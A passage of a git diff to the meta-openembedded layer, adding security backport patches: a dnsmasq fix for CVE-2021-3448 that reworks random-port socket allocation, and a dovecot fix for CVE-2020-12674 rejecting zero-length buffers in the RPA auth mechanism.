+@@ -1100,11 +1106,12 @@ extern struct daemon { + int forwardcount; + struct server *srv_save; /* Used for resend on DoD */ + size_t packet_len; /* " " */ +- struct randfd *rfd_save; /* " " */ ++ int fd_save; /* " " */ + pid_t tcp_pids[MAX_PROCS]; + int tcp_pipes[MAX_PROCS]; + int pipe_to_parent; + struct randfd randomsocks[RANDOM_SOCKS]; ++ struct randfd_list *rfl_spare, *rfl_poll; + int v6pktinfo; + struct addrlist *interface_addrs; /* list of all addresses/prefix lengths associated with all local interfaces */ + int log_id, log_display_id; /* ids of transactions for logging */ +@@ -1275,7 +1282,7 @@ void safe_strncpy(char *dest, const char + void safe_pipe(int *fd, int read_noblock); + void *whine_malloc(size_t size); + int sa_len(union mysockaddr *addr); +-int sockaddr_isequal(union mysockaddr *s1, union mysockaddr *s2); ++int sockaddr_isequal(const union mysockaddr *s1, const union mysockaddr *s2); + int hostname_isequal(const char *a, const char *b); + int hostname_issubdomain(char *a, char *b); + time_t dnsmasq_time(void); +@@ -1326,7 +1333,7 @@ char *parse_server(char *arg, union myso + int option_read_dynfile(char *file, int flags); + + /* forward.c */ +-void reply_query(int fd, int family, time_t now); ++void reply_query(int fd, time_t now); + void receive_query(struct listener *listen, time_t now); + unsigned char *tcp_request(int confd, time_t now, + union mysockaddr *local_addr, struct in_addr netmask, int auth_dns); +@@ -1336,13 +1343,12 @@ int send_from(int fd, int nowild, char * + union mysockaddr *to, union all_addr *source, + unsigned int iface); + void resend_query(void); +-struct randfd *allocate_rfd(int family); +-void free_rfd(struct randfd *rfd); ++int allocate_rfd(struct randfd_list **fdlp, struct server *serv); ++void free_rfds(struct randfd_list **fdlp); + + /* network.c */ + int indextoname(int fd, int index, char *name); + int local_bind(int fd, union mysockaddr *addr, char *intname, unsigned int ifindex, int is_tcp); +-int random_sock(int family); + void pre_allocate_sfds(void); + int reload_servers(char *fname); + void mark_servers(int flag); +Index: dnsmasq-2.81/src/forward.c +=================================================================== +--- dnsmasq-2.81.orig/src/forward.c ++++ dnsmasq-2.81/src/forward.c +@@ -16,7 +16,7 @@ + + #include "dnsmasq.h" + +-static struct frec *lookup_frec(unsigned short id, int fd, int family, void *hash); ++static struct frec *lookup_frec(unsigned short id, int fd, void *hash); + static struct frec *lookup_frec_by_sender(unsigned short id, + union mysockaddr *addr, + void *hash); +@@ -307,26 +307,18 @@ static int forward_query(int udpfd, unio + if (find_pseudoheader(header, plen, NULL, &pheader, &is_sign, NULL) && !is_sign) + PUTSHORT(SAFE_PKTSZ, pheader); + +- if (forward->sentto->addr.sa.sa_family == AF_INET) +- log_query(F_NOEXTRA | F_DNSSEC | F_IPV4, "retry", (union all_addr *)&forward->sentto->addr.in.sin_addr, "dnssec"); +- else +- log_query(F_NOEXTRA | F_DNSSEC | F_IPV6, "retry", (union all_addr *)&forward->sentto->addr.in6.sin6_addr, "dnssec"); +- +- +- if (forward->sentto->sfd) +- fd = forward->sentto->sfd->fd; +- else ++ if ((fd = allocate_rfd(&forward->rfds, forward->sentto)) != -1) + { +- if (forward->sentto->addr.sa.sa_family == AF_INET6) +- fd = forward->rfd6->fd; ++ if (forward->sentto->addr.sa.sa_family == AF_INET) ++ log_query(F_NOEXTRA | F_DNSSEC | F_IPV4, "retry", (union all_addr *)&forward->sentto->addr.in.sin_addr, "dnssec"); + else +- fd = forward->rfd4->fd; ++ log_query(F_NOEXTRA | F_DNSSEC | F_IPV6, "retry", (union all_addr *)&forward->sentto->addr.in6.sin6_addr, "dnssec"); ++ ++ while (retry_send(sendto(fd, (char *)header, plen, 0, ++ &forward->sentto->addr.sa, ++ sa_len(&forward->sentto->addr)))); + } + +- while (retry_send(sendto(fd, (char *)header, plen, 0, +- &forward->sentto->addr.sa, +- sa_len(&forward->sentto->addr)))); +- + return 1; + } + #endif +@@ -501,49 +493,28 @@ static int forward_query(int udpfd, unio + + while (1) + { ++ int fd; ++ + /* only send to servers dealing with our domain. + domain may be NULL, in which case server->domain + must be NULL also. */ + + if (type == (start->flags & SERV_TYPE) && + (type != SERV_HAS_DOMAIN || hostname_isequal(domain, start->domain)) && +- !(start->flags & (SERV_LITERAL_ADDRESS | SERV_LOOP))) ++ !(start->flags & (SERV_LITERAL_ADDRESS | SERV_LOOP)) && ++ ((fd = allocate_rfd(&forward->rfds, start)) != -1)) + { +- int fd; +- +- /* find server socket to use, may need to get random one. */ +- if (start->sfd) +- fd = start->sfd->fd; +- else +- { +- if (start->addr.sa.sa_family == AF_INET6) +- { +- if (!forward->rfd6 && +- !(forward->rfd6 = allocate_rfd(AF_INET6))) +- break; +- daemon->rfd_save = forward->rfd6; +- fd = forward->rfd6->fd; +- } +- else +- { +- if (!forward->rfd4 && +- !(forward->rfd4 = allocate_rfd(AF_INET))) +- break; +- daemon->rfd_save = forward->rfd4; +- fd = forward->rfd4->fd; +- } + + #ifdef HAVE_CONNTRACK +- /* Copy connection mark of incoming query to outgoing connection. */ +- if (option_bool(OPT_CONNTRACK)) +- { +- unsigned int mark; +- if (get_incoming_mark(&forward->source, &forward->dest, 0, &mark)) +- setsockopt(fd, SOL_SOCKET, SO_MARK, &mark, sizeof(unsigned int)); +- } +-#endif ++ /* Copy connection mark of incoming query to outgoing connection. */ ++ if (option_bool(OPT_CONNTRACK)) ++ { ++ unsigned int mark; ++ if (get_incoming_mark(&forward->frec_src.source, &forward->frec_src.dest, 0, &mark)) ++ setsockopt(fd, SOL_SOCKET, SO_MARK, &mark, sizeof(unsigned int)); + } +- ++#endif ++ + #ifdef HAVE_DNSSEC + if (option_bool(OPT_DNSSEC_VALID) && (forward->flags & FREC_ADDED_PHEADER)) + { +@@ -574,6 +545,7 @@ static int forward_query(int udpfd, unio + /* Keep info in case we want to re-send this packet */ + daemon->srv_save = start; + daemon->packet_len = plen; ++ daemon->fd_save = fd; + + if (!gotname) + strcpy(daemon->namebuff, "query"); +@@ -590,7 +562,7 @@ static int forward_query(int udpfd, unio + break; + forward->forwardall++; + } +- } ++ } + + if (!(start = start->next)) + start = daemon->servers; +@@ -805,7 +777,7 @@ static size_t process_reply(struct dns_h + } + + /* sets new last_server */ +-void reply_query(int fd, int family, time_t now) ++void reply_query(int fd, time_t now) + { + /* packet from peer server, extract data for cache, and send to + original requester */ +@@ -820,9 +792,9 @@ void reply_query(int fd, int family, tim + + /* packet buffer overwritten */ + daemon->srv_save = NULL; +- ++ + /* Determine the address of the server replying so that we can mark that as good */ +- if ((serveraddr.sa.sa_family = family) == AF_INET6) ++ if (serveraddr.sa.sa_family == AF_INET6) + serveraddr.in6.sin6_flowinfo = 0; + + header = (struct dns_header *)daemon->packet; +@@ -845,7 +817,7 @@ void reply_query(int fd, int family, tim + + hash = hash_questions(header, n, daemon->namebuff); + +- if (!(forward = lookup_frec(ntohs(header->id), fd, family, hash))) ++ if (!(forward = lookup_frec(ntohs(header->id), fd, hash))) + return; + + #ifdef HAVE_DUMPFILE +@@ -900,25 +872,8 @@ void reply_query(int fd, int family, tim + } + + +- if (start->sfd) +- fd = start->sfd->fd; +- else +- { +- if (start->addr.sa.sa_family == AF_INET6) +- { +- /* may have changed family */ +- if (!forward->rfd6) +- forward->rfd6 = allocate_rfd(AF_INET6); +- fd = forward->rfd6->fd; +- } +- else +- { +- /* may have changed family */ +- if (!forward->rfd4) +- forward->rfd4 = allocate_rfd(AF_INET); +- fd = forward->rfd4->fd; +- } +- } ++ if ((fd = allocate_rfd(&forward->rfds, start)) == -1) ++ return; + + #ifdef HAVE_DUMPFILE + dump_packet(DUMP_SEC_QUERY, (void *)header, (size_t)plen, NULL, &start->addr); +@@ -1126,8 +1081,7 @@ void reply_query(int fd, int family, tim + } + + new->sentto = server; +- new->rfd4 = NULL; +- new->rfd6 = NULL; ++ new->rfds = NULL; + new->frec_src.next = NULL; + new->flags &= ~(FREC_DNSKEY_QUERY | FREC_DS_QUERY | FREC_HAS_EXTRADATA); + new->forwardall = 0; +@@ -1166,24 +1120,7 @@ void reply_query(int fd, int family, tim + /* Don't resend this. */ + daemon->srv_save = NULL; + +- if (server->sfd) +- fd = server->sfd->fd; +- else +- { +- fd = -1; +- if (server->addr.sa.sa_family == AF_INET6) +- { +- if (new->rfd6 || (new->rfd6 = allocate_rfd(AF_INET6))) +- fd = new->rfd6->fd; +- } +- else +- { +- if (new->rfd4 || (new->rfd4 = allocate_rfd(AF_INET))) +- fd = new->rfd4->fd; +- } +- } +- +- if (fd != -1) ++ if ((fd = allocate_rfd(&new->rfds, server)) != -1) + { + #ifdef HAVE_CONNTRACK + /* Copy connection mark of incoming query to outgoing connection. */ +@@ -1344,7 +1281,7 @@ void receive_query(struct listener *list + + /* packet buffer overwritten */ + daemon->srv_save = NULL; +- ++ + dst_addr_4.s_addr = dst_addr.addr4.s_addr = 0; + netmask.s_addr = 0; + +@@ -2207,9 +2144,8 @@ static struct frec *allocate_frec(time_t + f->next = daemon->frec_list; + f->time = now; + f->sentto = NULL; +- f->rfd4 = NULL; ++ f->rfds = NULL; + f->flags = 0; +- f->rfd6 = NULL; + #ifdef HAVE_DNSSEC + f->dependent = NULL; + f->blocking_query = NULL; +@@ -2221,46 +2157,192 @@ static struct frec *allocate_frec(time_t + return f; + } + +-struct randfd *allocate_rfd(int family) ++/* return a UDP socket bound to a random port, have to cope with straying into ++ occupied port nos and reserved ones. */ ++static int random_sock(struct server *s) ++{ ++ int fd; ++ ++ if ((fd = socket(s->source_addr.sa.sa_family, SOCK_DGRAM, 0)) != -1) ++ { ++ if (local_bind(fd, &s->source_addr, s->interface, s->ifindex, 0)) ++ return fd; ++ ++ if (s->interface[0] == 0) ++ (void)prettyprint_addr(&s->source_addr, daemon->namebuff); ++ else ++ strcpy(daemon->namebuff, s->interface); ++ ++ my_syslog(LOG_ERR, _("failed to bind server socket to %s: %s"), ++ daemon->namebuff, strerror(errno)); ++ close(fd); ++ } ++ ++ return -1; ++} ++ ++/* compare source addresses and interface, serv2 can be null. */ ++static int server_isequal(const struct server *serv1, ++ const struct server *serv2) ++{ ++ return (serv2 && ++ serv2->ifindex == serv1->ifindex && ++ sockaddr_isequal(&serv2->source_addr, &serv1->source_addr) && ++ strncmp(serv2->interface, serv1->interface, IF_NAMESIZE) == 0); ++} ++ ++/* fdlp points to chain of randomfds already in use by transaction. ++ If there's already a suitable one, return it, else allocate a ++ new one and add it to the list. ++ ++ Not leaking any resources in the face of allocation failures ++ is rather convoluted here. ++ ++ Note that rfd->serv may be NULL, when a server goes away. ++*/ ++int allocate_rfd(struct randfd_list **fdlp, struct server *serv) + { + static int finger = 0; +- int i; ++ int i, j = 0; ++ struct randfd_list *rfl; ++ struct randfd *rfd = NULL; ++ int fd = 0; ++ ++ /* If server has a pre-allocated fd, use that. */ ++ if (serv->sfd) ++ return serv->sfd->fd; ++ ++ /* existing suitable random port socket linked to this transaction? */ ++ for (rfl = *fdlp; rfl; rfl = rfl->next) ++ if (server_isequal(serv, rfl->rfd->serv)) ++ return rfl->rfd->fd; ++ ++ /* No. need new link. */ ++ if ((rfl = daemon->rfl_spare)) ++ daemon->rfl_spare = rfl->next; ++ else if (!(rfl = whine_malloc(sizeof(struct randfd_list)))) ++ return -1; + + /* limit the number of sockets we have open to avoid starvation of + (eg) TFTP. Once we have a reasonable number, randomness should be OK */ +- + for (i = 0; i < RANDOM_SOCKS; i++) + if (daemon->randomsocks[i].refcount == 0) + { +- if ((daemon->randomsocks[i].fd = random_sock(family)) == -1) +- break; +- +- daemon->randomsocks[i].refcount = 1; +- daemon->randomsocks[i].family = family; +- return &daemon->randomsocks[i]; ++ if ((fd = random_sock(serv)) != -1) ++ { ++ rfd = &daemon->randomsocks[i]; ++ rfd->serv = serv; ++ rfd->fd = fd; ++ rfd->refcount = 1; ++ } ++ break; + } + + /* No free ones or cannot get new socket, grab an existing one */ +- for (i = 0; i < RANDOM_SOCKS; i++) ++ if (!rfd) ++ for (j = 0; j < RANDOM_SOCKS; j++) ++ { ++ i = (j + finger) % RANDOM_SOCKS; ++ if (daemon->randomsocks[i].refcount != 0 && ++ server_isequal(serv, daemon->randomsocks[i].serv) && ++ daemon->randomsocks[i].refcount != 0xfffe) ++ { ++ finger = i + 1; ++ rfd = &daemon->randomsocks[i]; ++ rfd->refcount++; ++ break; ++ } ++ } ++ ++ if (j == RANDOM_SOCKS) + { +- int j = (i+finger) % RANDOM_SOCKS; +- if (daemon->randomsocks[j].refcount != 0 && +- daemon->randomsocks[j].family == family && +- daemon->randomsocks[j].refcount != 0xffff) ++ struct randfd_list *rfl_poll; ++ ++ /* there are no free slots, and non with the same parameters we can piggy-back on. ++ We're going to have to allocate a new temporary record, distinguished by ++ refcount == 0xffff. This will exist in the frec randfd list, never be shared, ++ and be freed when no longer in use. It will also be held on ++ the daemon->rfl_poll list so the poll system can find it. */ ++ ++ if ((rfl_poll = daemon->rfl_spare)) ++ daemon->rfl_spare = rfl_poll->next; ++ else ++ rfl_poll = whine_malloc(sizeof(struct randfd_list)); ++ ++ if (!rfl_poll || ++ !(rfd = whine_malloc(sizeof(struct randfd))) || ++ (fd = random_sock(serv)) == -1) + { +- finger = j; +- daemon->randomsocks[j].refcount++; +- return &daemon->randomsocks[j]; ++ ++ /* Don't leak anything we may already have */ ++ rfl->next = daemon->rfl_spare; ++ daemon->rfl_spare = rfl; ++ ++ if (rfl_poll) ++ { ++ rfl_poll->next = daemon->rfl_spare; ++ daemon->rfl_spare = rfl_poll; ++ } ++ ++ if (rfd) ++ free(rfd); ++ ++ return -1; /* doom */ + } ++ ++ /* Note rfd->serv not set here, since it's not reused */ ++ rfd->fd = fd; ++ rfd->refcount = 0xffff; /* marker for temp record */ ++ ++ rfl_poll->rfd = rfd; ++ rfl_poll->next = daemon->rfl_poll; ++ daemon->rfl_poll = rfl_poll; + } + +- return NULL; /* doom */ ++ rfl->rfd = rfd; ++ rfl->next = *fdlp; ++ *fdlp = rfl; ++ ++ return rfl->rfd->fd; + } + +-void free_rfd(struct randfd *rfd) ++void free_rfds(struct randfd_list **fdlp) + { +- if (rfd && --(rfd->refcount) == 0) +- close(rfd->fd); ++ struct randfd_list *tmp, *rfl, *poll, *next, **up; ++ ++ for (rfl = *fdlp; rfl; rfl = tmp) ++ { ++ if (rfl->rfd->refcount == 0xffff || --(rfl->rfd->refcount) == 0) ++ close(rfl->rfd->fd); ++ ++ /* temporary overflow record */ ++ if (rfl->rfd->refcount == 0xffff) ++ { ++ free(rfl->rfd); ++ ++ /* go through the link of all these by steam to delete. ++ This list is expected to be almost always empty. */ ++ for (poll = daemon->rfl_poll, up = &daemon->rfl_poll; poll; poll = next) ++ { ++ next = poll->next; ++ ++ if (poll->rfd == rfl->rfd) ++ { ++ *up = poll->next; ++ poll->next = daemon->rfl_spare; ++ daemon->rfl_spare = poll; ++ } ++ else ++ up = &poll->next; ++ } ++ } ++ ++ tmp = rfl->next; ++ rfl->next = daemon->rfl_spare; ++ daemon->rfl_spare = rfl; ++ } ++ ++ *fdlp = NULL; + } + + static void free_frec(struct frec *f) +@@ -2276,12 +2358,9 @@ static void free_frec(struct frec *f) + } + + f->frec_src.next = NULL; +- free_rfd(f->rfd4); +- f->rfd4 = NULL; ++ free_rfds(&f->rfds); + f->sentto = NULL; + f->flags = 0; +- free_rfd(f->rfd6); +- f->rfd6 = NULL; + + #ifdef HAVE_DNSSEC + if (f->stash) +@@ -2389,26 +2468,39 @@ struct frec *get_new_frec(time_t now, in + } + + /* crc is all-ones if not known. */ +-static struct frec *lookup_frec(unsigned short id, int fd, int family, void *hash) ++static struct frec *lookup_frec(unsigned short id, int fd, void *hash) + { + struct frec *f; ++ struct server *s; ++ int type; ++ struct randfd_list *fdl; + + for(f = daemon->frec_list; f; f = f->next) + if (f->sentto && f->new_id == id && + (memcmp(hash, f->hash, HASH_SIZE) == 0)) + { + /* sent from random port */ +- if (family == AF_INET && f->rfd4 && f->rfd4->fd == fd) ++ for (fdl = f->rfds; fdl; fdl = fdl->next) ++ if (fdl->rfd->fd == fd) + return f; ++ } + +- if (family == AF_INET6 && f->rfd6 && f->rfd6->fd == fd) +- return f; ++ /* Sent to upstream from socket associated with a server. ++ Note we have to iterate over all the possible servers, since they may ++ have different bound sockets. */ ++ type = f->sentto->flags & SERV_TYPE; ++ s = f->sentto; ++ do { ++ if ((type == (s->flags & SERV_TYPE)) && ++ (type != SERV_HAS_DOMAIN || ++ (s->domain && hostname_isequal(f->sentto->domain, s->domain))) && ++ !(s->flags & (SERV_LITERAL_ADDRESS | SERV_LOOP)) && ++ s->sfd && s->sfd->fd == fd) ++ return f; ++ ++ s = s->next ? s->next : daemon->servers; ++ } while (s != f->sentto); + +- /* sent to upstream from bound socket. */ +- if (f->sentto->sfd && f->sentto->sfd->fd == fd) +- return f; +- } +- + return NULL; + } + +@@ -2454,30 +2546,26 @@ static struct frec *lookup_frec_by_query + void resend_query() + { + if (daemon->srv_save) +- { +- int fd; +- +- if (daemon->srv_save->sfd) +- fd = daemon->srv_save->sfd->fd; +- else if (daemon->rfd_save && daemon->rfd_save->refcount != 0) +- fd = daemon->rfd_save->fd; +- else +- return; +- +- while(retry_send(sendto(fd, daemon->packet, daemon->packet_len, 0, +- &daemon->srv_save->addr.sa, +- sa_len(&daemon->srv_save->addr)))); +- } ++ while(retry_send(sendto(daemon->fd_save, daemon->packet, daemon->packet_len, 0, ++ &daemon->srv_save->addr.sa, ++ sa_len(&daemon->srv_save->addr)))); + } + + /* A server record is going away, remove references to it */ + void server_gone(struct server *server) + { + struct frec *f; ++ int i; + + for (f = daemon->frec_list; f; f = f->next) + if (f->sentto && f->sentto == server) + free_frec(f); ++ ++ /* If any random socket refers to this server, NULL the reference. ++ No more references to the socket will be created in the future. */ ++ for (i = 0; i < RANDOM_SOCKS; i++) ++ if (daemon->randomsocks[i].refcount != 0 && daemon->randomsocks[i].serv == server) ++ daemon->randomsocks[i].serv = NULL; + + if (daemon->last_server == server) + daemon->last_server = NULL; +Index: dnsmasq-2.81/src/loop.c +=================================================================== +--- dnsmasq-2.81.orig/src/loop.c ++++ dnsmasq-2.81/src/loop.c +@@ -22,6 +22,7 @@ static ssize_t loop_make_probe(u32 uid); + void loop_send_probes() + { + struct server *serv; ++ struct randfd_list *rfds = NULL; + + if (!option_bool(OPT_LOOP_DETECT)) + return; +@@ -34,22 +35,15 @@ void loop_send_probes() + { + ssize_t len = loop_make_probe(serv->uid); + int fd; +- struct randfd *rfd = NULL; + +- if (serv->sfd) +- fd = serv->sfd->fd; +- else +- { +- if (!(rfd = allocate_rfd(serv->addr.sa.sa_family))) +- continue; +- fd = rfd->fd; +- } ++ if ((fd = allocate_rfd(&rfds, serv)) == -1) ++ continue; + + while (retry_send(sendto(fd, daemon->packet, len, 0, + &serv->addr.sa, sa_len(&serv->addr)))); +- +- free_rfd(rfd); + } ++ ++ free_rfds(&rfds); + } + + static ssize_t loop_make_probe(u32 uid) +Index: dnsmasq-2.81/src/network.c +=================================================================== +--- dnsmasq-2.81.orig/src/network.c ++++ dnsmasq-2.81/src/network.c +@@ -545,6 +545,7 @@ int enumerate_interfaces(int reset) + #ifdef HAVE_AUTH + struct auth_zone *zone; + #endif ++ struct server *serv; + + /* Do this max once per select cycle - also inhibits netlink socket use + in TCP child processes. */ +@@ -562,7 +563,21 @@ int enumerate_interfaces(int reset) + + if ((param.fd = socket(PF_INET, SOCK_DGRAM, 0)) == -1) + return 0; +- ++ ++ /* iface indexes can change when interfaces are created/destroyed. ++ We use them in the main forwarding control path, when the path ++ to a server is specified by an interface, so cache them. ++ Update the cache here. */ ++ for (serv = daemon->servers; serv; serv = serv->next) ++ if (strlen(serv->interface) != 0) ++ { ++ struct ifreq ifr; ++ ++ safe_strncpy(ifr.ifr_name, serv->interface, IF_NAMESIZE); ++ if (ioctl(param.fd, SIOCGIFINDEX, &ifr) != -1) ++ serv->ifindex = ifr.ifr_ifindex; ++ } ++ + /* Mark interfaces for garbage collection */ + for (iface = daemon->interfaces; iface; iface = iface->next) + iface->found = 0; +@@ -658,7 +673,7 @@ int enumerate_interfaces(int reset) + + errno = errsave; + spare = param.spare; +- ++ + return ret; + } + +@@ -798,10 +813,10 @@ int tcp_interface(int fd, int af) + /* use mshdr so that the CMSDG_* macros are available */ + msg.msg_control = daemon->packet; + msg.msg_controllen = len = daemon->packet_buff_sz; +- ++ + /* we overwrote the buffer... */ + daemon->srv_save = NULL; +- ++ + if (af == AF_INET) + { + if (setsockopt(fd, IPPROTO_IP, IP_PKTINFO, &opt, sizeof(opt)) != -1 && +@@ -1102,59 +1117,6 @@ void join_multicast(int dienow) + } + #endif + +-/* return a UDP socket bound to a random port, have to cope with straying into +- occupied port nos and reserved ones. */ +-int random_sock(int family) +-{ +- int fd; +- +- if ((fd = socket(family, SOCK_DGRAM, 0)) != -1) +- { +- union mysockaddr addr; +- unsigned int ports_avail = ((unsigned short)daemon->max_port - (unsigned short)daemon->min_port) + 1; +- int tries = ports_avail < 30 ? 3 * ports_avail : 100; +- +- memset(&addr, 0, sizeof(addr)); +- addr.sa.sa_family = family; +- +- /* don't loop forever if all ports in use. */ +- +- if (fix_fd(fd)) +- while(tries--) +- { +- unsigned short port = htons(daemon->min_port + (rand16() % ((unsigned short)ports_avail))); +- +- if (family == AF_INET) +- { +- addr.in.sin_addr.s_addr = INADDR_ANY; +- addr.in.sin_port = port; +-#ifdef HAVE_SOCKADDR_SA_LEN +- addr.in.sin_len = sizeof(struct sockaddr_in); +-#endif +- } +- else +- { +- addr.in6.sin6_addr = in6addr_any; +- addr.in6.sin6_port = port; +-#ifdef HAVE_SOCKADDR_SA_LEN +- addr.in6.sin6_len = sizeof(struct sockaddr_in6); +-#endif +- } +- +- if (bind(fd, (struct sockaddr *)&addr, sa_len(&addr)) == 0) +- return fd; +- +- if (errno != EADDRINUSE && errno != EACCES) +- break; +- } +- +- close(fd); +- } +- +- return -1; +-} +- +- + int local_bind(int fd, union mysockaddr *addr, char *intname, unsigned int ifindex, int is_tcp) + { + union mysockaddr addr_copy = *addr; +@@ -1199,38 +1161,33 @@ int local_bind(int fd, union mysockaddr + return 1; + } + +-static struct serverfd *allocate_sfd(union mysockaddr *addr, char *intname) ++static struct serverfd *allocate_sfd(union mysockaddr *addr, char *intname, unsigned int ifindex) + { + struct serverfd *sfd; +- unsigned int ifindex = 0; + int errsave; + int opt = 1; + + /* when using random ports, servers which would otherwise use +- the INADDR_ANY/port0 socket have sfd set to NULL */ +- if (!daemon->osport && intname[0] == 0) ++ the INADDR_ANY/port0 socket have sfd set to NULL, this is ++ anything without an explictly set source port. */ ++ if (!daemon->osport) + { + errno = 0; + + if (addr->sa.sa_family == AF_INET && +- addr->in.sin_addr.s_addr == INADDR_ANY && + addr->in.sin_port == htons(0)) + return NULL; + + if (addr->sa.sa_family == AF_INET6 && +- memcmp(&addr->in6.sin6_addr, &in6addr_any, sizeof(in6addr_any)) == 0 && + addr->in6.sin6_port == htons(0)) + return NULL; + } + +- if (intname && strlen(intname) != 0) +- ifindex = if_nametoindex(intname); /* index == 0 when not binding to an interface */ +- + /* may have a suitable one already */ + for (sfd = daemon->sfds; sfd; sfd = sfd->next ) +- if (sockaddr_isequal(&sfd->source_addr, addr) && +- strcmp(intname, sfd->interface) == 0 && +- ifindex == sfd->ifindex) ++ if (ifindex == sfd->ifindex && ++ sockaddr_isequal(&sfd->source_addr, addr) && ++ strcmp(intname, sfd->interface) == 0) + return sfd; + + /* need to make a new one. */ +@@ -1281,7 +1238,7 @@ void pre_allocate_sfds(void) + #ifdef HAVE_SOCKADDR_SA_LEN + addr.in.sin_len = sizeof(struct sockaddr_in); + #endif +- if ((sfd = allocate_sfd(&addr, ""))) ++ if ((sfd = allocate_sfd(&addr, "", 0))) + sfd->preallocated = 1; + + memset(&addr, 0, sizeof(addr)); +@@ -1291,13 +1248,13 @@ void pre_allocate_sfds(void) + #ifdef HAVE_SOCKADDR_SA_LEN + addr.in6.sin6_len = sizeof(struct sockaddr_in6); + #endif +- if ((sfd = allocate_sfd(&addr, ""))) ++ if ((sfd = allocate_sfd(&addr, "", 0))) + sfd->preallocated = 1; + } + + for (srv = daemon->servers; srv; srv = srv->next) + if (!(srv->flags & (SERV_LITERAL_ADDRESS | SERV_NO_ADDR | SERV_USE_RESOLV | SERV_NO_REBIND)) && +- !allocate_sfd(&srv->source_addr, srv->interface) && ++ !allocate_sfd(&srv->source_addr, srv->interface, srv->ifindex) && + errno != 0 && + option_bool(OPT_NOWILD)) + { +@@ -1506,7 +1463,7 @@ void check_servers(void) + + /* Do we need a socket set? */ + if (!serv->sfd && +- !(serv->sfd = allocate_sfd(&serv->source_addr, serv->interface)) && ++ !(serv->sfd = allocate_sfd(&serv->source_addr, serv->interface, serv->ifindex)) && + errno != 0) + { + my_syslog(LOG_WARNING, +Index: dnsmasq-2.81/src/option.c +=================================================================== +--- dnsmasq-2.81.orig/src/option.c ++++ dnsmasq-2.81/src/option.c +@@ -810,7 +810,8 @@ char *parse_server(char *arg, union myso + if (interface_opt) + { + #if defined(SO_BINDTODEVICE) +- safe_strncpy(interface, interface_opt, IF_NAMESIZE); ++ safe_strncpy(interface, source, IF_NAMESIZE); ++ source = interface_opt; + #else + return _("interface binding not supported"); + #endif +Index: dnsmasq-2.81/src/tftp.c +=================================================================== +--- dnsmasq-2.81.orig/src/tftp.c ++++ dnsmasq-2.81/src/tftp.c +@@ -601,7 +601,7 @@ void check_tftp_listeners(time_t now) + + /* we overwrote the buffer... */ + daemon->srv_save = NULL; +- ++ + if ((len = get_block(daemon->packet, transfer)) == -1) + { + len = tftp_err_oops(daemon->packet, transfer->file->filename); +Index: dnsmasq-2.81/src/util.c +=================================================================== +--- dnsmasq-2.81.orig/src/util.c ++++ dnsmasq-2.81/src/util.c +@@ -316,7 +316,7 @@ void *whine_malloc(size_t size) + return ret; + } + +-int sockaddr_isequal(union mysockaddr *s1, union mysockaddr *s2) ++int sockaddr_isequal(const union mysockaddr *s1, const union mysockaddr *s2) + { + if (s1->sa.sa_family == s2->sa.sa_family) + { diff --git a/meta-openembedded/meta-networking/recipes-support/dnsmasq/dnsmasq_2.81.bb b/meta-openembedded/meta-networking/recipes-support/dnsmasq/dnsmasq_2.81.bb index a1dc0f3a0a..2fb389915b 100644 --- a/meta-openembedded/meta-networking/recipes-support/dnsmasq/dnsmasq_2.81.bb +++ b/meta-openembedded/meta-networking/recipes-support/dnsmasq/dnsmasq_2.81.bb @@ -10,4 +10,5 @@ SRC_URI += "\ file://CVE-2020-25685-2.patch \ file://CVE-2020-25686-1.patch \ file://CVE-2020-25686-2.patch \ + file://CVE-2021-3448.patch \ " diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-auth-mech-rpa-Fail-on-zero-len-buffer.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-auth-mech-rpa-Fail-on-zero-len-buffer.patch new file mode 100644 index 0000000000..5580cd409f --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-auth-mech-rpa-Fail-on-zero-len-buffer.patch @@ -0,0 +1,30 @@ +From bd9d2fe7da833f0e4705a8280efc56930371806b Mon Sep 17 00:00:00 2001 +From: Aki Tuomi +Date: Wed, 6 May 2020 13:40:36 +0300 +Subject: [PATCH 1/3] auth: mech-rpa - Fail on zero len buffer + +--- + src/auth/mech-rpa.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Signed-off-by: Sana Kazi + +CVE: CVE-2020-12674 +Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_2.2.33.2-1ubuntu4.7.debian.tar.xz] +Comment: No change in any hunk + +diff --git a/src/auth/mech-rpa.c b/src/auth/mech-rpa.c +index 08298ebdd6..2de8705b4f 100644 +--- a/src/auth/mech-rpa.c ++++ b/src/auth/mech-rpa.c +@@ -224,7 +224,7 @@ rpa_read_buffer(pool_t pool, const unsigned char **data, + return 0; + + len = *p++; +- if (p + len > end) ++ if (p + len > end || len == 0) + return 0; + + *buffer = p_malloc(pool, len); +-- +2.11.0 diff --git a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-configure.ac-convert-AC_TRY_RUN-to-AC_TRY_LINK-state.patch b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-configure.ac-convert-AC_TRY_RUN-to-AC_TRY_LINK-state.patch index f86235076e..3f87714dcc 100644 --- a/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-configure.ac-convert-AC_TRY_RUN-to-AC_TRY_LINK-state.patch +++ b/meta-openembedded/meta-networking/recipes-support/dovecot/dovecot/0001-configure.ac-convert-AC_TRY_RUN-to-AC_TRY_LINK-state.patch @@ -13,11 +13,11 @@ Signed-off-by: Li Xin configure.ac | 15 +++++---------- 1 file changed, 5 insertions(+), 10 deletions(-) -diff --git a/configure.ac b/configure.ac -index 3b32614..94ec002 100644 ---- a/configure.ac -+++ b/configure.ac -@@ -519,13 +519,10 @@ have_ioloop=no +Index: dovecot-2.2.36.4/configure.ac +=================================================================== +--- dovecot-2.2.36.4.orig/configure.ac ++++ dovecot-2.2.36.4/configure.ac +@@ -490,13 +490,10 @@ have_ioloop=no if test "$ioloop" = "best" || test "$ioloop" = "epoll"; then AC_CACHE_CHECK([whether we can use epoll],i_cv_epoll_works,[ @@ -34,7 +34,7 @@ index 3b32614..94ec002 100644 ], [ i_cv_epoll_works=yes ], [ -@@ -653,7 +650,7 @@ fi +@@ -596,7 +593,7 @@ fi dnl * Old glibcs have broken posix_fallocate(). Make sure not to use it. dnl * It may also be broken in AIX. AC_CACHE_CHECK([whether posix_fallocate() works],i_cv_posix_fallocate_works,[ @@ -43,7 +43,7 @@ index 3b32614..94ec002 100644 #define _XOPEN_SOURCE 600 #include #include -@@ 